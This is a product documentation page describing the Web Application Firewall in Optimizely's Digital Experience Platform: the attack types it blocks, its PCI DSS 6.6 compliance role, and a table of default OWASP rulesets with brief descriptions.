HomeDev GuideAPI Reference
Dev GuideAPI ReferenceUser GuideGitHubNuGetDev CommunitySubmit a ticketLog In
GitHubNuGetDev CommunitySubmit a ticket

Web Application Firewall

Describes the concept of Web Application Firewall (WAF), specifically related to solutions built within Optimizely Digital Experience Platform (DXP).

In DXP, Web Application Firewall (WAF) is enabled, constantly monitoring the website traffic and filtering for malicious traffic at the web application layer. The WAF examines HTTP requests to your website, looking at GET and POST requests, and applies rules to filter illegitimate traffic from legitimate website visitors. Illegitimate traffic is challenged and blocked or stopped. See Open Systems Interconnection (OSI) Model.

How does WAF protect my website?

A WAF automatically protects from the following types of attacks:

  • SQL injection, comment spam
  • Cross-site scripting (XSS)
  • Distributed denial of service (DDoS) attacks

A WAF uses rulesets to block common attacks, like cross-site scripting (XSS) and SQL injections. Optimizely can update these rulesets at any time to keep the WAF up-to-date with evolving attack trends. Because the DXP handles significant attack traffic, it optimizes new attack styles and adds WAF rules to protect customers against these potential vulnerabilities.

The WAF engine runs the OWASP ModSecurity Core Ruleset by default, protecting you against the OWASP Top 10 common vulnerabilities.

WAF and Digital Experience Cloud (DXC) Service

  • Automatic protection from diverse threats, with strong default rulesets, providing Application layer protection that is fully integrated with DDoS mitigation.
  • Fast processing times with instant global updates.
  • Cost-effectively fulfill PCI compliance by utilizing WAF to meet PCI DSS requirement 6.6.
  • No hardware, software, or tuning is required because it is part of DXP.

There is no need to sacrifice speed for security. In the event of an attack, the DXP makes sure you are protected:

  • New rules typically take effect globally in under 30 seconds.
  • Less than one-millisecond latency for web visitors is common.

Compliance for PCI DSS requirement 6.6

You can cost-effectively fulfill PCI compliance using Digital Experience Cloud (DXC) WAF to meet Requirement 6.6. If you are a merchant who handles consumer credit card information, the following options meet the PCI DSS 2.0 and 3.0 Requirement 6.6:

  • Deploy a WAF in front of your website. (WAF is included with DXC Service.)
  • Conduct application vulnerability security reviews of your in-scope web applications.

The following table shows the DXP default ruleset for WAF, which is optimized for Optimizely applications and based on best practices. Custom rulesets cannot be defined at this time.

RulesetDescription
OWASP Bad RobotsDetects bad web robots that are not from search engines but perform malicious searching and spidering of websites.
OWASP Generic AttacksDetects generic attacks against web-based applications without specific knowledge of the application. Detects things such as attempting to access an LDAP directory, injecting shell commands, and attacks against PHP.
OWASP HTTP PolicyEnforces policies around the HTTP protocol, such as methods that are supported and headers that are allowed.
OWASP Protocol AnomaliesDetects unusual use of the HTTP protocol that may indicate an attack but may also be legitimate.
OWASP Protocol ViolationsDetects violations of the HTTP protocol that often indicate an attacker attempting to penetrate a site.
OWASP Request LimitsDetects excessively large numbers of HTTP headers, HTTP arguments, or files.
OWASP Slr Et Lfi AttacksDetects LFI attacks.
OWASP Slr Et RFI AttacksDetects RFI attacks.
OWASP Slr Et SQLi AttacksDetects SQLi attacks.
OWASP Slr Et XSS AttacksDetects XSS attacks.
OWASP TrojansDetects command web trojans.
OWASP SQL Injection AttacksDetects attacks against SQL servers that attempt to inject SQL statements through the web to leak information or take control of a SQL server.
OWASP XSS AttacksDetects cross-site scripting (XSS) attacks that may result in unwanted HTML inserted into web pages.
OWASP Uri SQL Injection AttacksDetects attacks against SQL servers that attempt to inject SQL statements through the web to leak information or take control of a SQL server through URIs.
OWASP Uri XSS AttacksDetects cross-site scripting (XSS) attacks that may result in unwanted HTML inserted into web pages through URIs.